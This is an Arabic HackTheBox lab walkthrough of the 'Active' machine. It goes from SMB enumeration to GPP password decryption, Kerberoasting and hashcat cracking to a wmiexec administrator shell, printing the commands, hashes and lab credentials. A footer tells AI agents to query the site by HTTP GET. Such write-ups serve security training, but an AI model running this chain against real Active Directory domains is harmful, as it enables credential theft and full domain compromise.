# Active - بالعربي ![](/files/-M__r4wntDnAOoKDk000) ## Recon ### nmap ``` nmap -sV -sC -p- 10.10.10.100 ``` ``` Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 07:46 EDT Nmap scan report for 10.10.10.100 Host is up (0.41s latency). Not shown: 65512 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-13 12:43:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49169/tcp open msrpc Microsoft Windows RPC 49172/tcp open msrpc Microsoft Windows RPC 49182/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: |_clock-skew: 33m57s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-05-13T12:44:51 |_ start_date: 2021-05-13T12:19:24 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1473.41 seconds ``` ### SMB smbmap & smbclient ``` smbmap -H 10.10.10.100 ``` ``` [+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL NO ACCESS Logon server share Users NO ACCESS ``` عنا READ ONLY على ال Replication فخلينا نشوفها ``` smbclient //10.10.10.100/Replication ``` ``` Enter WORKGROUP\kali's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 active.htb D 0 Sat Jul 21 06:37:44 2018 10459647 blocks of size 4096. 5728531 blocks available smb: \> cd active.htb smb: \active.htb\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018 Policies D 0 Sat Jul 21 06:37:44 2018 scripts D 0 Wed Jul 18 14:48:57 2018 10459647 blocks of size 4096. 5728531 blocks available ``` رح نزل كلشي, باستخدام الاوامر هي ``` smb: \> mask "" smb: \> recurse ON smb: \> prompt OFF smb: \> mget * ``` بعد مانزلو بحثت جوا الملفات و لعبت شوي المهم وصلت ل Policies و بالاخر ملف Groups.xml, بمجرد ما شفتهم عرفت ان هي GPP او Group Policy Preferences و هدول عبارة مجموعة من ال Group Policy و بتكون على جهة المستخدم او بسموها client-side و هي الي بتوصل الاعدادات للاجهزة البتكون تابعة لل domain. ![](https://media.giphy.com/media/3otPoI68XRrUoQ5IQw/giphy.gif) هي بكون فيها اسماء مستخدمين و كلمات سر فإذا رحت لهون ``` active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml ``` و فتحت الملف هاد رح تلاقي هيدا الكود ```markup ``` اذا لاحظت في *name* و كمان *cpassword* و هي بتكون مشفرة بتشفير AES فلازم نكسر التشفير او crack و فينا نستخدم اداة اسمها gpp-decrypt.py ([اضغط هنا!](https://github.com/t0thkr1s/gpp-decrypt)) ``` python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ``` ``` __ __ ___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_ / _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/ \_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/ /___/ /_/ /_/ /___/ /_/ [ * ] Password: GPPstillStandingStrong2k18 ``` هيك حصلنا كلمة سر, هاد الشيء رائع على فكرة لازم تحتفل ياصديقي, جرب نط من الشباك ![](https://media.giphy.com/media/Q3qzcQGOIOg1i/giphy.gif) > CREDS: svc\_tgs:GPPstillStandingStrong2k18 ### MSRPC ``` rpcclient -U "" -N 10.10.10.100 ``` ``` rpcclient $> enumdomusers Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED ``` بعد ما شفت رسالة ال NT\_STATUS\_ACCESS\_DENIED قلت مافي فائدة ترجى و ال LDAP ما كتير الصراحة اهتميت فقلت اروح مباشرة لمرحلة اني ادخل عل ماشين Get Acess و للاسف هاد الشي مانجح فرجعت مرة تانية لل SMB مع ال creds الحصلناها ### SMB with svc\_tgs ``` smbclient //10.10.10.100/Users -U 'svc_tgs' ``` ``` Enter WORKGROUP\svc_tgs's password: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Sat Jul 21 10:39:20 2018 .. DR 0 Sat Jul 21 10:39:20 2018 Administrator D 0 Mon Jul 16 06:14:21 2018 All Users DHSrn 0 Tue Jul 14 01:06:44 2009 Default DHR 0 Tue Jul 14 02:38:21 2009 Default User DHSrn 0 Tue Jul 14 01:06:44 2009 desktop.ini AHS 174 Tue Jul 14 00:57:55 2009 Public DR 0 Tue Jul 14 00:57:55 2009 SVC_TGS D 0 Sat Jul 21 11:16:32 2018 10459647 blocks of size 4096. 5728499 blocks available ``` طبعا حملت كلشي متل ما عملنا من قبل ### So much time on DAT files بعد ما حملتهم, و كنت مخلص كل الفوق باقل من 10د قعدت بحلل ملفات الدات هي لكم ساعة و ابحث و اقرأ و بالاخر طلعت ولا شي او على الاقل انا ماحصلت شي, طبعا لازم اتخطى الموضوع رغم اني قلبي انكسر بس لازم تتخطى و تروح للمرحلة البعدها ### Kerberoasting يلا Kerberoasting ❤ ``` impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request ``` ازا صار و حصلت رسالة خطأ كلاتي: ``` Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) ``` استخدم هي الاداة, المشكلة بتنزامن الوقت بينك و بين الهدف ``` ntpdate 10.10.10.100 ``` عموما حصلنا ال TGT ``` $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$f3549302f6dd2e829e0b67a08c8f68f014bea465fc1d0c5fe21e9bed19023293dd073c0dc586f2966bb40dcf2b562e98cfd957cec08bb7c72bb70fc7f6c8a046491637edc5f0fb647ee580bd73efb5393bb0edc16127345a2c4a3308daf69337ed33a0171cd16cb25bec00272ee67eaf45e729c60162ad274d73229f67a3824466a179d4f9b27e9aee2f4cce2c9dfd71047dc701db1c2d9c35b7dee5f66c4c9b8104025483f5c8da703b8b02681ec555e1beaac0bc191ac8f4076a298485402dc8d2906d78aa2beaee5be930d1019a651475224ae20e83f74da92402cb6448a38265c89a225c7389576f5498152e7e19624508be412500ee832a321662f3b3270720d38b3827c32b5bed9fee4308b32cb04dcf6321dc6d4a13cbf447c100f765d2b5d9cff2c0c5829f1e81c689760bdec97b5e68ced8f644bccca83cb12545f583b39c67886692fca4023ce9a00bac2c14d2b5da844a9cabad5df166bf58216b0fd10d6a48e1c65c3680162c1a55e8d08558cb952e115c009bf73e37a969610e5851ce44c54a90443da67efa34581769b9529f596a55f4d114504f398a359d21ad8af6d824a8bfd7fb97820db023d4b01021ac3fffe59734f2f96ea981fa9a460c968de8c8d8b2cb2c4dccc34998f55b15dfa2a98e998268fea835b87b6720aed1b4c3b5c08e7fcc8d88699b346a00f2f7f1e4424503fc9448cf3f309247ed393f2abbb0e0b01d55c4a7882eac246b6e27586a0494bb87e6e6e467a466366478690c7fde07106cacf656ca9f83a16c5199c314abbfa2a8a5ef4af6b34038ec6ff3593884d21182a93478554fcf25ecdfc1d9487437292fd517377858603bb7e05296b7737ead17ee182c632b97e4c0c23872af2f731919fb9aa954a710f8f5a7a0216dfdd8deeaaadcefddbeec69d88d7b644859e47fdf2c7deec748028a978957104632e87021411fb06ecff4e579441933d5a7ba9bf422b2834cdf9fe4988eb6e394ea3b2b20eecdd7fc4c25f4dae66d090417288700b385036d16ca373d146820a10d2404192701595f22660900b1f7ad2145a7bb13ae3db3ae5ba70c41a6787f3baf48e8d844b43a95d7665281a18e5ea64b7d0f7b15b4188278f64452f8c5a3d1f8e11f79b4420d1b87f7c987533486fb763a96b1209d5d7684254560952b478b7ac26ddb2bc8ff89c4734d06c627f9ad423710a242de08c6b5ba683f440a66bdba3abb563abb532a444b226422c934c2c7a4ab6f61ae30 ``` نكسرها ب hashcat ``` hashcat.exe -m 13100 admin_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU ``` ``` $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c823ffdcfd7b669bd5b854492702915f$f3549302f6dd2e829e0b67a08c8f68f014bea465fc1d0c5fe21e9bed19023293dd073c0dc586f2966bb40dcf2b562e98cfd957cec08bb7c72bb70fc7f6c8a046491637edc5f0fb647ee580bd73efb5393bb0edc16127345a2c4a3308daf69337ed33a0171cd16cb25bec00272ee67eaf45e729c60162ad274d73229f67a3824466a179d4f9b27e9aee2f4cce2c9dfd71047dc701db1c2d9c35b7dee5f66c4c9b8104025483f5c8da703b8b02681ec555e1beaac0bc191ac8f4076a298485402dc8d2906d78aa2beaee5be930d1019a651475224ae20e83f74da92402cb6448a38265c89a225c7389576f5498152e7e19624508be412500ee832a321662f3b3270720d38b3827c32b5bed9fee4308b32cb04dcf6321dc6d4a13cbf447c100f765d2b5d9cff2c0c5829f1e81c689760bdec97b5e68ced8f644bccca83cb12545f583b39c67886692fca4023ce9a00bac2c14d2b5da844a9cabad5df166bf58216b0fd10d6a48e1c65c3680162c1a55e8d08558cb952e115c009bf73e37a969610e5851ce44c54a90443da67efa34581769b9529f596a55f4d114504f398a359d21ad8af6d824a8bfd7fb97820db023d4b01021ac3fffe59734f2f96ea981fa9a460c968de8c8d8b2cb2c4dccc34998f55b15dfa2a98e998268fea835b87b6720aed1b4c3b5c08e7fcc8d88699b346a00f2f7f1e4424503fc9448cf3f309247ed393f2abbb0e0b01d55c4a7882eac246b6e27586a0494bb87e6e6e467a466366478690c7fde07106cacf656ca9f83a16c5199c314abbfa2a8a5ef4af6b34038ec6ff3593884d21182a93478554fcf25ecdfc1d9487437292fd517377858603bb7e05296b7737ead17ee182c632b97e4c0c23872af2f731919fb9aa954a710f8f5a7a0216dfdd8deeaaadcefddbeec69d88d7b644859e47fdf2c7deec748028a978957104632e87021411fb06ecff4e579441933d5a7ba9bf422b2834cdf9fe4988eb6e394ea3b2b20eecdd7fc4c25f4dae66d090417288700b385036d16ca373d146820a10d2404192701595f22660900b1f7ad2145a7bb13ae3db3ae5ba70c41a6787f3baf48e8d844b43a95d7665281a18e5ea64b7d0f7b15b4188278f64452f8c5a3d1f8e11f79b4420d1b87f7c987533486fb763a96b1209d5d7684254560952b478b7ac26ddb2bc8ff89c4734d06c627f9ad423710a242de08c6b5ba683f440a66bdba3abb563abb532a444b226422c934c2c7a4ab6f61ae30:Ticketmaster1968 ``` و هيك حصلنا اخر creds بدنا هي ![](https://media.giphy.com/media/Mcvod8Hq2ymyPBXv4N/giphy.gif) > CREDS: Administrator:Ticketmaster1968 ## ‍Get Access \ هلق باستخدام اداة wmiexec فينا ندخل على الماشين ``` wmiexec.py 'active.htb/Administrator:Ticketmaster1968@10.10.10.100' ``` ``` Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] SMBv2.1 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami active\administrator C:\> ``` اداة wmiexec بتستخدم ال wmi protocol و الي هو قسم من مجموعة ادوات الادارة لمابكروسوفت بوفرلك نوع من الادارة و المراقبة بشكل اساسي و بزودك بمعلومات عن انظمة و يندوز كمان فينك تكتبله ادوات و اشياء automation بمتل VBScript و powershell.\ لهون منكون خلصنا, سلام! *Happy Hacking*\ *MHZ-Cyber* --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mhzcyber.gitbook.io/vulnerability-research-ar/hackthebox-ar/active-ar.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.